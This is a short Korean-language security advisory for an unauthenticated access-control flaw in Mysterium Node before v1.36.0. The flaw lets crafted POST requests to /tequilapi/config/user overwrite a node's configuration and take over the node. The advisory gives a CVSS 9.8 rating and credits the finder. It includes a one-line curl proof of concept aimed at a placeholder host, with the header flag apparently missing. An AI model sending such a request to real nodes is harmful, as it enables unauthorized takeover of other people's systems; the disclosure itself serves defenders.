
Mysterium Node v1.36.0 이전의 부적절한 접근 제어
Mysterium Node의 /tequilapi/config/user 엔드포인트의 부적절한 권한 부여로 인해 v1.21.1-rc0부터 v1.36.0 이전까지의 버전에서 인증되지 않은 공격자가 노드 구성을 임의로 덮어쓰고 조작된 POST 요청을 통해 전체 노드를 장악할 수 있습니다.
점수: 9.8 (CRITICAL)
벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
curl -X POST \
"Content-Type: application/json" \
-d @config.json \
http://<host>:<port>/tequilapi/config/user
발견자: Till Schacht.